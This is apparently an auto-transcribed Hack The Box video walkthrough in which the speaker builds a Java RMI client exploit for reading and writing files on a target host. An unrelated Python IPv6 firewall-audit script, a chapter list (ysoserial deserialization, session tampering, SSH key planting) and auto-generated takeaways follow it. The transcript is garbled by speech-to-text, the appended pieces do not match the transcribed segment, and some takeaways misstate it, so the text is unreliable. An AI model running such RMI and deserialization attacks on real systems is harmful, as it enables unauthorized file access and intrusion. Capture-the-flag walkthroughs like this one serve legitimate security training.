[Music] over oh I know what's happening um RMI is a mapper so what's happening is we're connecting to 90002 here and then when we say we want to list a file it's giving us a new address so it's like an HTTP redirect think of it that way and it's putting that remote registry. 
htbn so I'm going to copy the address go that way then let's sud sudo VY host and put this address in we want to copy that paste no other paste there we go and I bet when we run this now it will work let's see it did not unknown host remote. registry. htb remote. registry. htb ping remote registry htb we can ping it run unknown host oh registry. webhosting registry there we go hope I have the correct name run Nest exception is unknown dyslexia moment there's no web hosting let's just copy and paste okay create connection that is embarrassing I had the wrong host there okay this is no longer a error in um the her name we're just getting a unmarshaling error abstract file class invalid for der serialization huh so we do SVC list vhost do we have the Vost wrong no that's set correctly right yep we connect do we do the loop any different is even air where is it airing is it airing at the Loop or when we get it step over we've connected we run this so we're not even getting to this piece so our error is here and I'm not sure why that is um my first thought is our code is correct and the issue is when we decompiled the library something got screwed up with this service so I want to try um just making this using the class file so we're not going through any decompilation so to do that it's a little bit complex I guess but I'm going to um let's see let's go back into a source directory I'm going to make a new one called exploit then I'm going to copy exploit. Java into this directory so we can CP exploit. 
Java here and then we should have the war file so we'll do 7zx dot dot slash dot dot hold on make the attemp 7zx let's get the hosting war in this one more directory and then I want to move web classes come to this directory and then we need a manifest right let's copy The Meta manifest up one as well okay and then let's see that's fine we just need to put the main class and that's going to be Comm htb hosting RMI exploit because that's what we called our file and we should be able to compile this so oh before we do we have to give this a package so this would be package com htb hosting RMI I think so we can compile this with Java C compile to Java version 8 The Source 8 exploit. Java one warning that should be fine and then we we compile the jar so jar CFM give it the file we just created oh no uh file exploit. Java what command did I run we did that oh we created the class yeah that's right jar CFM so we're going to create exploit. jar and then give it the Manifest and then every directory okay so we have it so Java djar exploit cannot find or load this you have exploit. 
class package com hosting I think that's fine let's remove exploit jar move exploit class into Comm htb hosting RMI let's create that jar Java djar exploit there we go and yes it does work so our code is working it's just when we have it decompiled it does not which I don't know exactly where that error came from but yeah that is not intuitive so we probably have to revisit how we decompiled this app if we really wanted to I'm guessing like using Jad or something on each class may be better but at least we see that so let's just fix up this code um I think it's going to be easier if we work with this and then just recompile we just lose the ability to do run which is annoying so where are we what do we want to do well we have this we do two dots we know at least we're in that so I guess we should create a buffered reader so let's comment all this stuff out so we have a proof of concept there um now let's do final buffered reader reader like this and let's say um while true and we can read a command off of it let's get rid of a lot of this okay so we have to probably do import statements because it can't resolve these so let's do import buffer reader input streamer okay why can't that uh unhandled exception so I guess we put this in a try statement catch that's fine let's do proper indenting okay let's see what this looks like enter a command if we do test we don't get anything if we do exit it exits so we have a menu so let's do instead of enter command I like a carrot like that and then we're going to have things like LS and then a directory right so we have the command here and we want to split it so um let's see split string on first space does it tell me how to do that string Parts two awesome wonder if we is this let's see CMD args can that do it wonder if I say string like that no I was trying to assign them both at the same time uh we can call this split and then say CMD split one urg like that then say if CMD equals exit break let's just do a switch 
statement CMD case exit break case LS and let's do print listing files in let's see what this looks like run do nothing that's fine LS slome there we go so we do have our AR press working fine so what else did we want to do we want to be able to um print files so we do case cat and then um we want to be able to write a file okay that should be fine and at this point we can no longer um debug a code which is going to be annoying so hopefully we write this correctly so let's grab some of this let's see here's the loop the V host don't need that we don't need the list do we need this try here is it going to error if we don't it does unhandled exception okay so here we can do that list and I screwed it up because I deleted the code that had it um we have it in this one right oops exploit. Java this is what I want okay why is this erroring cannot be resolved um so the issue here is when we're calling service here it's in this Tri block and it's essentially in these curly brackets so when it leaves this this variable gets freed and not there free is probably the bad term but we have to declare the variable outside of the brackets so let's do a file service SVC is equal to null and now we say oh now it's saying it's duplicate variable because we declared it again so if we just remove this file service call and do VC it works so I think that is good here so we want to be able to read files so let's do SVC dot let's see what is the function to get a file it's probably get file I wonder what the difference between two guessing we have to call this one because we want to give it the vhost and the argument and and let's see this returns probably bytes string two um abstract file so is it file abstract file like this file let's see cannot be resolved um let's see is there a different thing let's go back to the client wrapper that's not what I want actually file service maybe view that'll be bytes I'm guessing we give it one parameter it is just going to do like it's going to 
try to get the vhost by itself and if we give it two um it won't so let's say um b b is equal to view like that then we want to print the bite okay and then we want to write the file and this is also going to be extra arguments so let's see how do we want to call this
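The /proc/net/if_inet6 lookup and the iptables-only-covers-IPv4 point from the transcript, as an added example that is not code from the video or from the box: a Python parser for that file's fixed-width format which decodes each address and its scope, and lists the global-scope addresses, which are exactly the ones an IPv4-only iptables policy leaves uncovered and so the ones a defender has to mirror into ip6tables (or an nftables inet-family table). The sample file content is constructed; it is not the box's real addresses. On a real host, feed it `open("/proc/net/if_inet6").read()` instead of the sample.

```python
"""Audit helper for the IPv4-only host-firewall mistake shown in the video.

Added example; not code from the video or the box. The sample file content
below is constructed and does not contain the box's real addresses.

/proc/net/if_inet6 holds one address per line, six space-separated fields:
  <32 hex chars address> <ifindex> <prefix len> <scope> <flags> <ifname>
Every numeric field is hexadecimal.
"""
import ipaddress
from dataclasses import dataclass
from typing import List

# Constructed sample: loopback, one link-local and one global address on eth0.
SAMPLE_IF_INET6 = """\
00000000000000000000000000000001 01 80 10 80       lo
fe8000000000000000421aff4e00b2c3 02 40 20 80     eth0
deadbeef0000000000000000000000c3 02 40 00 80     eth0
"""

# Scope values as the kernel prints them (its IPV6_ADDR_* scope constants).
SCOPE_NAMES = {0x00: "global", 0x10: "loopback", 0x20: "link-local", 0x40: "site-local"}


@dataclass
class Inet6Entry:
    address: ipaddress.IPv6Address
    ifindex: int
    prefix_len: int
    scope: int
    flags: int
    ifname: str

    @property
    def scope_name(self) -> str:
        return SCOPE_NAMES.get(self.scope, f"unknown(0x{self.scope:02x})")


def parse_if_inet6(text: str) -> List[Inet6Entry]:
    """Parse the text of /proc/net/if_inet6 into structured entries."""
    entries: List[Inet6Entry] = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        if len(fields) != 6 or len(fields[0]) != 32:
            raise ValueError(f"malformed if_inet6 line: {line!r}")
        raw, ifindex, plen, scope, flags, ifname = fields
        # The address is 16 raw bytes written as 32 hex digits with no colons;
        # ipaddress accepts the packed form and gives us a proper IPv6Address.
        entries.append(Inet6Entry(
            address=ipaddress.IPv6Address(bytes.fromhex(raw)),
            ifindex=int(ifindex, 16),
            prefix_len=int(plen, 16),
            scope=int(scope, 16),
            flags=int(flags, 16),
            ifname=ifname,
        ))
    return entries


def global_addresses(entries: List[Inet6Entry]) -> List[ipaddress.IPv6Address]:
    """Addresses reachable from off-host: global scope, not loopback or link-local.

    An IPv4-only iptables ruleset says nothing about these, so the ip6tables
    (or nftables inet) policy must cover them explicitly.
    """
    return [e.address for e in entries if e.scope == 0x00]


def endpoint_literal(addr: ipaddress.IPv6Address, port: int) -> str:
    """Bracketed host:port form; the compressed form uses '::' at most once."""
    return f"[{addr.compressed}]:{port}"


def is_valid_ipv6_literal(text: str) -> bool:
    """True only for a well-formed literal; a second '::' is rejected."""
    try:
        ipaddress.IPv6Address(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    entries = parse_if_inet6(SAMPLE_IF_INET6)
    for e in entries:
        print(f"{e.ifname:6} {e.scope_name:11} {e.address.exploded} -> "
              f"{e.address.compressed}/{e.prefix_len}")
    for a in global_addresses(entries):
        print("needs an ip6tables rule:", endpoint_literal(a, 9002))
```

The scope column is what separates a finding from noise: loopback and link-local entries are not reachable from another network anyway, so the audit only reports global-scope addresses, and the same check run after the firewall change confirms that each reported address is now covered.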

Original Description

00:00 - Intro
01:00 - Start of nmap
03:10 - Enumerating port 5000/5001 to see a Docker Registry and Auth Server
06:10 - Creating our auth token for the Docker Registry
08:45 - Adding the SSL Cert to our certificate store, then doing a docker pull to download and run the container
13:00 - Discovering JSESSIONID Cookie, attempting the weird directory traversal bug of /..;/ (nginx directory didn't have a trailing slash on the location)
16:45 - The Examples directory has a sessions example that lets us modify the session, doing this to get a File Disclosure vulnerability then downloading the WAR file hosting the app
27:45 - Opening the WAR in JD-GUI then examining the source code, discovering we can change our user to admin by editing the session
33:30 - Pointing the RMI.HOST back to us, then use YSOSERIAL to host a malicious server
42:50 - YSOSERIAL-MODIFIED Docker is up, using YSOSERIAL to start a JRMP Listener and host a malicious payload
46:45 - Shell on the container, showing where IPv6 addresses are stored (/proc/if_inet6) and that we could have gotten this with the file disclosure which allows for bypassing the firewall, did not need to do the ysoserial step for this next one.
52:51 - Looking at the source code again, discovering we can use the RMI to perform file operations on the host
56:00 - Start of creating the RMI Client Java App
1:09:18 - Running into an error using our decompiled code. Having our exploit just reference the class files (before decompilation)
1:25:00 - Finishing up our exploit script, then writing an SSH Key
1:36:60 - Looking at running processes, discovering the RMI Server restarts every 3 minutes, then running PSPY discovering a quarentine.jar
1:43:00 - Looking at the initial JAR again, discovering it will give out a config. Using RECAF so I can just replace code in the jar without recompiling
1:48:00 - Looking at the Quarantine Service, which pulls a config from the RMI Server then runs CLAM AV
1:51:40 - Having CLAM AV scan /root, and fl

Key Takeaways
  1. Enumerate versions and open formats with Nmap
  2. Run a curl command to access the Docker registry API
  3. Set up an RMI server to exfiltrate files
  4. Specify the header and token to access the catalog
  5. Use Java Decompiler to decompile the library
  6. Create a new Java class file to avoid decompilation issues
  7. Compile the Java class file to create a JAR file
  8. Use the JAR file to connect to the remote registry
